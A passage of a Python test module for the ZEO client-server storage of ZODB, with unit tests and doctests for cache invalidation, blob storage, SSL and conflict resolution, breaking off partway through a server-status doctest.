from ZEO.tests import forker, Cache, CommitLockTests, ThreadTests
from ZEO.tests import IterationTests
from ZEO._compat import PY3
from ZEO._compat import WIN
from ZODB.Connection import TransactionMetaData
from ZODB.tests import StorageTestBase, BasicStorage, \
TransactionalUndoStorage, \
PackableStorage, Synchronization, ConflictResolution, RevisionStorage, \
MTStorage, ReadOnlyStorage, IteratorStorage, RecoveryStorage
from ZODB.tests.MinPO import MinPO
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.utils import maxtid, p64, u64, z64
from zope.testing import renormalizing
import doctest
import logging
import os
import persistent
import pprint
import re
import shutil
import signal
import stat
import ssl
import sys
import tempfile
import threading
import time
import transaction
import unittest
import ZEO.StorageServer
import ZEO.tests.ConnectionTests
import ZODB
import ZODB.blob
import ZODB.tests.hexstorage
import ZODB.tests.testblob
import ZODB.tests.util
import ZODB.utils
import zope.testing.setupstack
from . import testssl
logger = logging.getLogger('ZEO.tests.testZEO')
class DummyDB(object):
def invalidate(self, *args):
pass
def invalidateCache(*unused):
pass
transform_record_data = untransform_record_data = lambda self, v: v
class CreativeGetState(persistent.Persistent):
def __getstate__(self):
self.name = 'me'
return super(CreativeGetState, self).__getstate__()
class Test_convenience_functions(unittest.TestCase):
def test_ZEO_client_convenience(self):
import mock
import ZEO
client_thread = mock.Mock(
spec=['call', 'async', 'async_iter', 'wait'])
client = ZEO.client(
8001, wait=False, _client_factory=client_thread)
self.assertIsInstance(client, ClientStorage)
def test_ZEO_DB_convenience_ok(self):
import mock
import ZEO
client_mock = mock.Mock(spec=['close'])
client_patch = mock.patch('ZEO.client', return_value=client_mock)
DB_patch = mock.patch('ZODB.DB')
dummy = object()
with client_patch as client:
with DB_patch as patched:
db = ZEO.DB(dummy)
self.assertIs(db, patched())
client.assert_called_once_with(dummy)
client_mock.close.assert_not_called()
def test_ZEO_DB_convenience_error(self):
import mock
import ZEO
client_mock = mock.Mock(spec=['close'])
client_patch = mock.patch('ZEO.client', return_value=client_mock)
DB_patch = mock.patch('ZODB.DB', side_effect=ValueError)
dummy = object()
with client_patch as client:
with DB_patch:
with self.assertRaises(ValueError):
ZEO.DB(dummy)
client.assert_called_once_with(dummy)
client_mock.close.assert_called_once()
def test_ZEO_connection_convenience_ok(self):
import mock
import ZEO
ret = object()
DB_mock = mock.Mock(spec=[
'close', 'open_then_close_db_when_connection_closes'])
DB_mock.open_then_close_db_when_connection_closes.return_value = ret
DB_patch = mock.patch('ZEO.DB', return_value=DB_mock)
dummy = object()
with DB_patch as patched:
conn = ZEO.connection(dummy)
self.assertIs(conn, ret)
patched.assert_called_once_with(dummy)
DB_mock.close.assert_not_called()
def test_ZEO_connection_convenience_value(self):
import mock
import ZEO
DB_mock = mock.Mock(spec=[
'close', 'open_then_close_db_when_connection_closes'])
otc = DB_mock.open_then_close_db_when_connection_closes
otc.side_effect = ValueError
DB_patch = mock.patch('ZEO.DB', return_value=DB_mock)
dummy = object()
with DB_patch as patched:
with self.assertRaises(ValueError):
ZEO.connection(dummy)
patched.assert_called_once_with(dummy)
DB_mock.close.assert_called_once()
class MiscZEOTests(object):
"""ZEO tests that don't fit in elsewhere."""
def checkCreativeGetState(self):
# This test covers persistent objects that provide their own
# __getstate__ which modifies the state of the object.
# For details see bug #98275
db = ZODB.DB(self._storage)
cn = db.open()
rt = cn.root()
m = CreativeGetState()
m.attr = 'hi'
rt['a'] = m
# This commit used to fail because of the `Mine` object being put back
# into `changed` state although it was already stored causing the ZEO
# cache to bail out.
transaction.commit()
cn.close()
def checkLargeUpdate(self):
obj = MinPO("X" * (10 * 128 * 1024))
self._dostore(data=obj)
def checkZEOInvalidation(self):
addr = self._storage._addr
storage2 = self._wrap_client(
ClientStorage(addr, wait=1, **self._client_options()))
try:
oid = self._storage.new_oid()
ob = MinPO('first')
revid1 = self._dostore(oid, data=ob)
data, serial = storage2.load(oid, '')
self.assertEqual(zodb_unpickle(data), MinPO('first'))
self.assertEqual(serial, revid1)
revid2 = self._dostore(oid, data=MinPO('second'), revid=revid1)
# Now, storage 2 should eventually get the new data. It
# will take some time, although hopefully not much.
# We'll poll till we get it and whine if we time out:
for n in range(30):
time.sleep(.1)
data, serial = storage2.load(oid, '')
if (serial == revid2 and
zodb_unpickle(data) == MinPO('second')
):
break
else:
raise AssertionError('Invalidation message was not sent!')
finally:
storage2.close()
def checkVolatileCacheWithImmediateLastTransaction(self):
# Earlier, a ClientStorage would not have the last transaction id
# available right after successful connection, this is required now.
addr = self._storage._addr
storage2 = ClientStorage(addr, **self._client_options())
self.assertTrue(storage2.is_connected())
self.assertEqual(ZODB.utils.z64, storage2.lastTransaction())
storage2.close()
self._dostore()
storage3 = ClientStorage(addr, **self._client_options())
self.assertTrue(storage3.is_connected())
self.assertEqual(8, len(storage3.lastTransaction()))
self.assertNotEqual(ZODB.utils.z64, storage3.lastTransaction())
storage3.close()
class GenericTestBase(
# Base class for all ZODB tests
StorageTestBase.StorageTestBase):
shared_blob_dir = False
blob_cache_dir = None
server_debug = False
def setUp(self):
StorageTestBase.StorageTestBase.setUp(self)
logger.info("setUp() %s", self.id())
zport, stop = forker.start_zeo_server(
self.getConfig(), self.getZEOConfig(), debug=self.server_debug)
self._servers = [stop]
if not self.blob_cache_dir:
# This is the blob cache for ClientStorage
self.blob_cache_dir = tempfile.mkdtemp(
'blob_cache',
dir=os.path.abspath(os.getcwd()))
self._storage = self._wrap_client(
ClientStorage(
zport, '1', cache_size=20000000,
min_disconnect_poll=0.5, wait=1,
wait_timeout=60, blob_dir=self.blob_cache_dir,
shared_blob_dir=self.shared_blob_dir,
**self._client_options()),
)
self._storage.registerDB(DummyDB())
def getZEOConfig(self):
return forker.ZEOConfig(('127.0.0.1', 0))
def _wrap_client(self, client):
return client
def _client_options(self):
return {}
def tearDown(self):
self._storage.close()
for stop in self._servers:
stop()
StorageTestBase.StorageTestBase.tearDown(self)
class GenericTests(
GenericTestBase,
# ZODB test mixin classes (in the same order as imported)
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
# ZEO test mixin classes (in the same order as imported)
CommitLockTests.CommitLockVoteTests,
ThreadTests.ThreadTests,
# Locally defined (see above)
MiscZEOTests,
):
"""Combine tests from various origins in one class.
"""
def open(self, read_only=0):
# Needed to support ReadOnlyStorage tests. Ought to be a
# cleaner way.
addr = self._storage._addr
self._storage.close()
self._storage = ClientStorage(
addr, read_only=read_only, wait=1, **self._client_options())
def checkWriteMethods(self):
# ReadOnlyStorage defines checkWriteMethods. The decision
# about where to raise the read-only error was changed after
# Zope 2.5 was released. So this test needs to detect Zope
# of the 2.5 vintage and skip the test.
# The __version__ attribute was not present in Zope 2.5.
if hasattr(ZODB, "__version__"):
ReadOnlyStorage.ReadOnlyStorage.checkWriteMethods(self)
def checkSortKey(self):
key = '%s:%s' % (self._storage._storage, self._storage._server_addr)
self.assertEqual(self._storage.sortKey(), key)
def _do_store_in_separate_thread(self, oid, revid, voted):
def do_store():
store = ZEO.ClientStorage.ClientStorage(
self._storage._addr, **self._client_options())
try:
t = transaction.get()
store.tpc_begin(t)
store.store(oid, revid, b'x', '', t)
store.tpc_vote(t)
store.tpc_finish(t)
except Exception as v:
import traceback
print('E'*70)
print(v)
traceback.print_exception(*sys.exc_info())
finally:
store.close()
thread = threading.Thread(name='T2', target=do_store)
thread.setDaemon(True)
thread.start()
thread.join(voted and .1 or 9)
return thread
class FullGenericTests(
GenericTests,
Cache.TransUndoStorageWithCache,
ConflictResolution.ConflictResolvingStorage,
ConflictResolution.ConflictResolvingTransUndoStorage,
PackableStorage.PackableUndoStorage,
RevisionStorage.RevisionStorage,
TransactionalUndoStorage.TransactionalUndoStorage,
IteratorStorage.IteratorStorage,
IterationTests.IterationTests,
):
"""Extend GenericTests with tests that MappingStorage can't pass."""
def checkPackUndoLog(self):
# PackableStorage.PackableUndoStorage wants to adjust
# time.sleep and time.time to cooperate and pretend for time
# to pass. That doesn't work for the spawned server, and this
# test case is very sensitive to times matching.
super_meth = super(FullGenericTests, self).checkPackUndoLog
# Find the underlying function, not the decorated method.
# If it doesn't exist, the implementation has changed and we
# need to revisit this...
try:
underlying_func = super_meth.__wrapped__
except AttributeError:
# ...unless we're on Python 2, which doesn't have the __wrapped__
# attribute.
if bytes is not str: # pragma: no cover Python 3
raise
unbound_func = PackableStorage.PackableUndoStorage.checkPackUndoLog
wrapper_func = unbound_func.__func__
underlying_func = wrapper_func.func_closure[0].cell_contents
underlying_func(self)
class FileStorageRecoveryTests(StorageTestBase.StorageTestBase,
RecoveryStorage.RecoveryStorage):
def getConfig(self):
return """\
<filestorage 1>
path %s
</filestorage>
""" % tempfile.mktemp(dir='.')
def _new_storage(self):
zconf = forker.ZEOConfig(('127.0.0.1', 0))
zport, stop = forker.start_zeo_server(self.getConfig(),
zconf)
self._servers.append(stop)
blob_cache_dir = tempfile.mkdtemp(dir='.')
storage = ClientStorage(
zport, '1', cache_size=20000000,
min_disconnect_poll=0.5, wait=1,
wait_timeout=60, blob_dir=blob_cache_dir)
storage.registerDB(DummyDB())
return storage
def setUp(self):
StorageTestBase.StorageTestBase.setUp(self)
self._servers = []
self._storage = self._new_storage()
self._dst = self._new_storage()
def tearDown(self):
self._storage.close()
self._dst.close()
for stop in self._servers:
stop()
StorageTestBase.StorageTestBase.tearDown(self)
def new_dest(self):
return self._new_storage()
class FileStorageTests(FullGenericTests):
"""Test ZEO backed by a FileStorage."""
def getConfig(self):
return """\
<filestorage 1>
path Data.fs
</filestorage>
"""
_expected_interfaces = (
('ZODB.interfaces', 'IStorageRestoreable'),
('ZODB.interfaces', 'IStorageIteration'),
('ZODB.interfaces', 'IStorageUndoable'),
('ZODB.interfaces', 'IStorageCurrentRecordIteration'),
('ZODB.interfaces', 'IExternalGC'),
('ZODB.interfaces', 'IStorage'),
('zope.interface', 'Interface'),
)
def checkInterfaceFromRemoteStorage(self):
# ClientStorage itself doesn't implement IStorageIteration, but the
# FileStorage on the other end does, and thus the ClientStorage
# instance that is connected to it reflects this.
self.assertFalse(ZODB.interfaces.IStorageIteration.implementedBy(
ZEO.ClientStorage.ClientStorage))
self.assertTrue(ZODB.interfaces.IStorageIteration.providedBy(
self._storage))
# This is communicated using ClientStorage's _info object:
self.assertEqual(self._expected_interfaces,
self._storage._info['interfaces']
)
class FileStorageSSLTests(FileStorageTests):
def getZEOConfig(self):
return testssl.server_config
def _client_options(self):
return {'ssl': testssl.client_ssl()}
class FileStorageHexTests(FileStorageTests):
_expected_interfaces = (
('ZODB.interfaces', 'IStorageRestoreable'),
('ZODB.interfaces', 'IStorageIteration'),
('ZODB.interfaces', 'IStorageUndoable'),
('ZODB.interfaces', 'IStorageCurrentRecordIteration'),
('ZODB.interfaces', 'IExternalGC'),
('ZODB.interfaces', 'IStorage'),
('ZODB.interfaces', 'IStorageWrapper'),
('zope.interface', 'Interface'),
)
def getConfig(self):
return """\
%import ZODB.tests
<hexstorage>
<filestorage 1>
path Data.fs
</filestorage>
</hexstorage>
"""
class FileStorageClientHexTests(FileStorageHexTests):
use_extension_bytes = True
def getConfig(self):
return """\
%import ZODB.tests
<serverhexstorage>
<filestorage 1>
path Data.fs
</filestorage>
</serverhexstorage>
"""
def _wrap_client(self, client):
return ZODB.tests.hexstorage.HexStorage(client)
class ClientConflictResolutionTests(
GenericTestBase,
ConflictResolution.ConflictResolvingStorage,
):
def getConfig(self):
return '<mappingstorage>\n</mappingstorage>\n'
def getZEOConfig(self):
# Using '' can result in binding to :: and cause problems
# connecting to the MTAcceptor on Travis CI
return forker.ZEOConfig(('127.0.0.1', 0), client_conflict_resolution=True)
class MappingStorageTests(GenericTests):
"""ZEO backed by a Mapping storage."""
def getConfig(self):
return """<mappingstorage 1/>"""
def checkSimpleIteration(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
def checkUndoZombie(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
class DemoStorageTests(
GenericTests,
):
def getConfig(self):
return """
<demostorage 1>
<filestorage 1>
path Data.fs
</filestorage>
</demostorage>
"""
def checkUndoZombie(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
def checkPackWithMultiDatabaseReferences(self):
pass # DemoStorage pack doesn't do gc
checkPackAllRevisions = checkPackWithMultiDatabaseReferences
class ZRPCConnectionTests(ZEO.tests.ConnectionTests.CommonSetupTearDown):
def getConfig(self, path, create, read_only):
return """<mappingstorage 1/>"""
def checkCatastrophicClientLoopFailure(self):
# Test what happens when the client loop falls over
self._storage = self.openClientStorage()
import zope.testing.loggingsupport
handler = zope.testing.loggingsupport.InstalledHandler(
'ZEO.asyncio.client')
# We no longer implement the event loop, we we no longer know
# how to break it. We'll just stop it instead for now.
self._storage._server.loop.call_soon_threadsafe(
self._storage._server.loop.stop)
forker.wait_until(
'disconnected',
lambda : not self._storage.is_connected()
)
log = str(handler)
handler.uninstall()
self.assertTrue("Client loop stopped unexpectedly" in log)
def checkExceptionLogsAtError(self):
# Test the exceptions are logged at error
self._storage = self.openClientStorage()
self._dostore(z64, data=MinPO("X" * (10 * 128 * 1024)))
from zope.testing.loggingsupport import InstalledHandler
handler = InstalledHandler('ZEO.asyncio.client')
import ZODB.POSException
self.assertRaises(TypeError, self._storage.history, z64, None)
self.assertTrue(re.search(" from server: .*TypeError", str(handler)))
# POSKeyErrors and ConflictErrors aren't logged:
handler.clear()
self.assertRaises(ZODB.POSException.POSKeyError,
self._storage.history, None, None)
handler.uninstall()
self.assertEqual(str(handler), '')
def checkConnectionInvalidationOnReconnect(self):
storage = ClientStorage(self.addr, min_disconnect_poll=0.1)
self._storage = storage
assert storage.is_connected()
class DummyDB(object):
_invalidatedCache = 0
def invalidateCache(self):
self._invalidatedCache += 1
def invalidate(*a, **k):
pass
transform_record_data = untransform_record_data = \
lambda self, data: data
db = DummyDB()
storage.registerDB(db)
base = db._invalidatedCache
# Now we'll force a disconnection and reconnection
storage._server.loop.call_soon_threadsafe(
storage._server.client.protocol.connection_lost,
ValueError('test'))
# and we'll wait for the storage to be reconnected:
for i in range(100):
if storage.is_connected():
if db._invalidatedCache > base:
break
time.sleep(0.1)
else:
raise AssertionError("Couldn't connect to server")
# Now, the root object in the connection should have been invalidated:
self.assertEqual(db._invalidatedCache, base+1)
class CommonBlobTests(object):
def getConfig(self):
return """
<blobstorage 1>
blob-dir blobs
<filestorage 2>
path Data.fs
</filestorage>
</blobstorage>
"""
blobdir = 'blobs'
blob_cache_dir = 'blob_cache'
def checkStoreBlob(self):
import transaction
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.StorageTestBase import zodb_pickle
somedata = b'a' * 10
blob = Blob()
with blob.open('w') as bd_fh:
bd_fh.write(somedata)
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
self.assertTrue(os.path.exists(tfname))
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
revid = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
self.assertTrue(not os.path.exists(tfname))
filename = self._storage.fshelper.getBlobFilename(oid, revid)
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(somedata, f.read())
def checkStoreBlob_wrong_partition(self):
os_rename = os.rename
try:
def fail(*a):
raise OSError
os.rename = fail
self.checkStoreBlob()
finally:
os.rename = os_rename
def checkLoadBlob(self):
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import zodb_pickle, ZERO
import transaction
somedata = b'a' * 10
blob = Blob()
with blob.open('w') as bd_fh:
bd_fh.write(somedata)
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
serial = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
filename = self._storage.loadBlob(oid, serial)
with open(filename, 'rb') as f:
self.assertEqual(somedata, f.read())
self.assertTrue(not(os.stat(filename).st_mode & stat.S_IWRITE))
self.assertTrue((os.stat(filename).st_mode & stat.S_IREAD))
def checkTemporaryDirectory(self):
self.assertEqual(os.path.join(self.blob_cache_dir, 'tmp'),
self._storage.temporaryDirectory())
def checkTransactionBufferCleanup(self):
oid = self._storage.new_oid()
with open('blob_file', 'wb') as f:
f.write(b'I am a happy blob.')
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.storeBlob(
oid, ZODB.utils.z64, 'foo', 'blob_file', '', t)
self._storage.close()
class BlobAdaptedFileStorageTests(FullGenericTests, CommonBlobTests):
"""ZEO backed by a BlobStorage-adapted FileStorage."""
def checkStoreAndLoadBlob(self):
import transaction
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.StorageTestBase import zodb_pickle
somedata_path = os.path.join(self.blob_cache_dir, 'somedata')
with open(somedata_path, 'w+b') as somedata:
for i in range(1000000):
somedata.write(("%s\n" % i).encode('ascii'))
def check_data(path):
self.assertTrue(os.path.exists(path))
somedata.seek(0)
d1 = d2 = 1
with open(path, 'rb') as f:
while d1 or d2:
d1 = f.read(8096)
d2 = somedata.read(8096)
self.assertEqual(d1, d2)
somedata.seek(0)
blob = Blob()
with blob.open('w') as bd_fh:
ZODB.utils.cp(somedata, bd_fh)
bd_fh.close()
tfname = bd_fh.name
oid = self._storage.new_oid()
data = zodb_pickle(blob)
self.assertTrue(os.path.exists(tfname))
t = TransactionMetaData()
try:
self._storage.tpc_begin(t)
self._storage.storeBlob(oid, ZERO, data, tfname, '', t)
self._storage.tpc_vote(t)
revid = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
# The uncommitted data file should have been removed
self.assertTrue(not os.path.exists(tfname))
# The file should be in the cache ...
filename = self._storage.fshelper.getBlobFilename(oid, revid)
check_data(filename)
# ... and on the server
server_filename = os.path.join(
self.blobdir,
ZODB.blob.BushyLayout().getBlobFilePath(oid, revid),
)
self.assertTrue(server_filename.startswith(self.blobdir))
check_data(server_filename)
# If we remove it from the cache and call loadBlob, it should
# come back. We can do this in many threads.
ZODB.blob.remove_committed(filename)
returns = []
threads = [
threading.Thread(
target=lambda :
returns.append(self._storage.loadBlob(oid, revid))
)
for i in range(10)
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
[self.assertEqual(r, filename) for r in returns]
check_data(filename)
class BlobWritableCacheTests(FullGenericTests, CommonBlobTests):
blob_cache_dir = 'blobs'
shared_blob_dir = True
class FauxConn(object):
addr = 'x'
protocol_version = ZEO.asyncio.server.best_protocol_version
peer_protocol_version = protocol_version
serials = []
def async_(self, method, *args):
if method == 'serialnos':
self.serials.extend(args[0])
call_soon_threadsafe = async_threadsafe = async_
class StorageServerWrapper(object):
def __init__(self, server, storage_id):
self.storage_id = storage_id
self.server = ZEO.StorageServer.ZEOStorage(server, server.read_only)
self.server.notify_connected(FauxConn())
self.server.register(storage_id, False)
def sortKey(self):
return self.storage_id
def __getattr__(self, name):
return getattr(self.server, name)
def registerDB(self, *args):
pass
def supportsUndo(self):
return False
def new_oid(self):
return self.server.new_oids(1)[0]
def tpc_begin(self, transaction):
self.server.tpc_begin(id(transaction), '', '', {}, None, ' ')
def tpc_vote(self, transaction):
result = self.server.vote(id(transaction))
assert result == self.server.connection.serials[:]
del self.server.connection.serials[:]
return result
def store(self, oid, serial, data, version_ignored, transaction):
self.server.storea(oid, serial, data, id(transaction))
def send_reply(self, _, result): # Masquerade as conn
self._result = result
def tpc_abort(self, transaction):
self.server.tpc_abort(id(transaction))
def tpc_finish(self, transaction, func = lambda: None):
self.server.tpc_finish(id(transaction)).set_sender(0, self)
return self._result
def multiple_storages_invalidation_queue_is_not_insane():
"""
>>> from ZEO.StorageServer import StorageServer, ZEOStorage
>>> from ZODB.FileStorage import FileStorage
>>> from ZODB.DB import DB
>>> from persistent.mapping import PersistentMapping
>>> from transaction import commit
>>> fs1 = FileStorage('t1.fs')
>>> fs2 = FileStorage('t2.fs')
>>> server = StorageServer(None, storages=dict(fs1=fs1, fs2=fs2))
>>> s1 = StorageServerWrapper(server, 'fs1')
>>> s2 = StorageServerWrapper(server, 'fs2')
>>> db1 = DB(s1); conn1 = db1.open()
>>> db2 = DB(s2); conn2 = db2.open()
>>> commit()
>>> o1 = conn1.root()
>>> for i in range(10):
... o1.x = PersistentMapping(); o1 = o1.x
... commit()
>>> last = fs1.lastTransaction()
>>> for i in range(5):
... o1.x = PersistentMapping(); o1 = o1.x
... commit()
>>> o2 = conn2.root()
>>> for i in range(20):
... o2.x = PersistentMapping(); o2 = o2.x
... commit()
>>> trans, oids = s1.getInvalidations(last)
>>> from ZODB.utils import u64
>>> sorted([int(u64(oid)) for oid in oids])
[10, 11, 12, 13, 14, 15]
>>> fs1.close(); fs2.close()
"""
def getInvalidationsAfterServerRestart():
"""
Clients were often forced to verify their caches after a server
restart even if there weren't many transactions between the server
restart and the client connect.
Let's create a file storage and stuff some data into it:
>>> from ZEO.StorageServer import StorageServer, ZEOStorage
>>> from ZODB.FileStorage import FileStorage
>>> from ZODB.DB import DB
>>> from persistent.mapping import PersistentMapping
>>> fs = FileStorage('t.fs')
>>> db = DB(fs)
>>> conn = db.open()
>>> from transaction import commit
>>> last = []
>>> for i in range(100):
... conn.root()[i] = PersistentMapping()
... commit()
... last.append(fs.lastTransaction())
>>> db.close()
Now we'll open a storage server on the data, simulating a restart:
>>> fs = FileStorage('t.fs')
>>> sv = StorageServer(None, dict(fs=fs))
>>> s = ZEOStorage(sv, sv.read_only)
>>> s.notify_connected(FauxConn())
>>> s.register('fs', False) == fs.lastTransaction()
True
If we ask for the last transaction, we should get the last transaction
we saved:
>>> s.lastTransaction() == last[-1]
True
If a storage implements the method lastInvalidations, as FileStorage
does, then the storage server will populate its invalidation data
structure using lastTransactions.
>>> tid, oids = s.getInvalidations(last[-10])
>>> tid == last[-1]
True
>>> from ZODB.utils import u64
>>> sorted([int(u64(oid)) for oid in oids])
[0, 92, 93, 94, 95, 96, 97, 98, 99, 100]
>>> fs.close()
If a storage doesn't implement lastInvalidations, a client can still
avoid verifying its cache if it was up to date when the server
restarted. To illustrate this, we'll create a subclass of FileStorage
without this method:
>>> class FS(FileStorage):
... lastInvalidations = property()
>>> fs = FS('t.fs')
>>> sv = StorageServer(None, dict(fs=fs))
>>> st = StorageServerWrapper(sv, 'fs')
>>> s = st.server
Now, if we ask for the invalidations since the last committed
transaction, we'll get a result:
>>> tid, oids = s.getInvalidations(last[-1])
>>> tid == last[-1]
True
>>> oids
[]
>>> db = DB(st); conn = db.open()
>>> ob = conn.root()
>>> for i in range(5):
... ob.x = PersistentMapping(); ob = ob.x
... commit()
... last.append(fs.lastTransaction())
>>> ntid, oids = s.getInvalidations(tid)
>>> ntid == last[-1]
True
>>> sorted([int(u64(oid)) for oid in oids])
[0, 101, 102, 103, 104, 105]
Note that in all cases invalidations include both modified objects and objects
that were only created.
>>> fs.close()
"""
def tpc_finish_error():
r"""Server errors in tpc_finish weren't handled properly.
If there are errors applying changes to the client cache, don't
leave the cache in an inconsistent state.
>>> addr, admin = start_server()
>>> client = ZEO.client(addr)
>>> db = ZODB.DB(client)
>>> conn = db.open()
>>> conn.root.x = 1
>>> t = conn.transaction_manager.get()
>>> conn.tpc_begin(t)
>>> conn.commit(t)
>>> transaction_meta_data = t.data(conn)
>>> _ = client.tpc_vote(transaction_meta_data)
Cause some breakage by messing with the clients transaction
buffer, sadly, using implementation details:
>>> tbuf = client._check_trans(transaction_meta_data, 'test')
>>> tbuf.client_resolved = None
tpc_finish will fail:
>>> client.tpc_finish(transaction_meta_data) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: ...
>>> client.tpc_abort(transaction_meta_data)
>>> t.abort()
But we can still load the saved data:
>>> conn2 = db.open()
>>> conn2.root.x
1
And we can save new data:
>>> conn2.root.x += 1
>>> conn2.transaction_manager.commit()
>>> db.close()
>>> stop_server(admin)
"""
def test_prefetch(self):
"""The client storage prefetch method pre-fetches from the server
>>> count = 999
>>> import ZEO
>>> addr, stop = start_server()
>>> conn = ZEO.connection(addr)
>>> root = conn.root()
>>> cls = root.__class__
>>> for i in range(count):
... root[i] = cls()
>>> conn.transaction_manager.commit()
>>> oids = [root[i]._p_oid for i in range(count)]
>>> conn.close()
>>> conn = ZEO.connection(addr)
>>> storage = conn.db().storage
>>> len(storage._cache) <= 1
True
>>> storage.prefetch(oids, conn._storage._start)
The prefetch returns before the cache is filled:
>>> len(storage._cache) < count
True
But it is filled eventually:
>>> from zope.testing.wait import wait
>>> wait(lambda : len(storage._cache) > count)
>>> loads = storage.server_status()['loads']
Now if we reload the data, it will be satisfied from the cache:
>>> for oid in oids:
... _ = conn._storage.load(oid)
>>> storage.server_status()['loads'] == loads
True
>>> conn.close()
"""
def client_has_newer_data_than_server():
"""It is bad if a client has newer data than the server.
>>> db = ZODB.DB('Data.fs')
>>> db.close()
>>> r = shutil.copyfile('Data.fs', 'Data.save')
>>> addr, admin = start_server(keep=1)
>>> db = ZEO.DB(addr, name='client', max_disconnect_poll=.01)
>>> wait_connected(db.storage)
>>> conn = db.open()
>>> conn.root().x = 1
>>> transaction.commit()
OK, we've added some data to the storage and the client cache has
the new data. Now, we'll stop the server, put back the old data, and
see what happens. :)
>>> stop_server(admin)
>>> r = shutil.copyfile('Data.save', 'Data.fs')
>>> import zope.testing.loggingsupport
>>> handler = zope.testing.loggingsupport.InstalledHandler(
... 'ZEO', level=logging.ERROR)
>>> formatter = logging.Formatter('%(name)s %(levelname)s %(message)s')
>>> _, admin = start_server(addr=addr)
>>> wait_until('got enough errors', lambda:
... len([x for x in handler.records
... if x.levelname == 'CRITICAL' and
... 'Client has seen newer transactions than server!' in x.msg
... ]) >= 2)
Note that the errors repeat because the client keeps on trying to connect.
>>> db.close()
>>> handler.uninstall()
>>> stop_server(admin)
"""
def history_over_zeo():
"""
>>> addr, _ = start_server()
>>> db = ZEO.DB(addr)
>>> wait_connected(db.storage)
>>> conn = db.open()
>>> conn.root().x = 0
>>> transaction.commit()
>>> len(db.history(conn.root()._p_oid, 99))
2
>>> db.close()
"""
def dont_log_poskeyerrors_on_server():
"""
>>> addr, admin = start_server(log='server.log')
>>> cs = ClientStorage(addr)
>>> cs.load(ZODB.utils.p64(1))
Traceback (most recent call last):
...
POSKeyError: 0x01
>>> cs.close()
>>> stop_server(admin)
>>> with open('server.log') as f:
... 'POSKeyError' in f.read()
False
"""
def open_convenience():
"""Often, we just want to open a single connection.
>>> addr, _ = start_server(path='data.fs')
>>> conn = ZEO.connection(addr)
>>> conn.root()
{}
>>> conn.root()['x'] = 1
>>> transaction.commit()
>>> conn.close()
Let's make sure the database was cloased when we closed the
connection, and that the data is there.
>>> db = ZEO.DB(addr)
>>> conn = db.open()
>>> conn.root()
{'x': 1}
>>> db.close()
"""
def client_asyncore_thread_has_name():
"""
>>> addr, _ = start_server()
>>> db = ZEO.DB(addr)
>>> any(t for t in threading.enumerate()
... if ' zeo client networking thread' in t.getName())
True
>>> db.close()
"""
def runzeo_without_configfile():
"""
>>> with open('runzeo', 'w') as r:
... _ = r.write('''
... import sys
... sys.path[:] = %r
... import ZEO.runzeo
... ZEO.runzeo.main(sys.argv[1:])
... ''' % sys.path)
>>> import subprocess, re
>>> print(re.sub(br'\d\d+|[:]', b'', subprocess.Popen(
... [sys.executable, 'runzeo', '-a:0', '-ft', '--test'],
... stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
... ).stdout.read()).decode('ascii'))
... # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
------
--T INFO ZEO.runzeo () opening storage '1' using FileStorage
------
--T INFO ZEO.StorageServer StorageServer created RW with storages 1RWt
------
--T INFO ZEO.asyncio... listening on ...
------
--T INFO ZEO.StorageServer closing storage '1'
testing exit immediately
"""
def close_client_storage_w_invalidations():
r"""
Invalidations could cause errors when closing client storages,
>>> addr, _ = start_server()
>>> writing = threading.Event()
>>> def mad_write_thread():
... global writing
... conn = ZEO.connection(addr)
... writing.set()
... while writing.isSet():
... conn.root.x = 1
... transaction.commit()
... conn.close()
>>> thread = threading.Thread(target=mad_write_thread)
>>> thread.setDaemon(True)
>>> thread.start()
>>> _ = writing.wait()
>>> time.sleep(.01)
>>> for i in range(10):
... conn = ZEO.connection(addr)
... _ = conn._storage.load(b'\0'*8)
... conn.close()
>>> writing.clear()
>>> thread.join(1)
"""
def convenient_to_pass_port_to_client_and_ZEO_dot_client():
"""Jim hates typing
>>> addr, _ = start_server()
>>> client = ZEO.client(addr[1])
>>> client.__name__ == "('127.0.0.1', %s)" % addr[1]
True
>>> client.close()
"""
@forker.skip_if_testing_client_against_zeo4
def test_server_status():
"""
You can get server status using the server_status method.
>>> addr, _ = start_server(zeo_conf=dict(transaction_timeout=1))
>>> db = ZEO.DB(addr)
>>> pprint.pprint(db.storage.server_status(), width=40)
{'aborts': 0,
'active_txns': 0,
'commits': 1,
'conflicts': 0,
'conflicts_resolved': 0,
'connections': 1,
'last-transaction': '03ac11b771fa1c00',
'loads': 1,
'lock_time': None,
'start': 'Tue May 4 10:55:20 2010',
'stores': 1,
'timeout-thread-is-alive': True,
'waiting': 0}
>>> db.close()
"""
@forker.skip_if_testing_client_against_zeo4
def test_ruok():
"""
You can also get server status using the ruok protocol.
>>> addr, _ = start_server(zeo_conf=dict(transaction_timeout=1))
>>> db = ZEO.DB(addr) # force a transaction :)
>>> import json, socket, struct
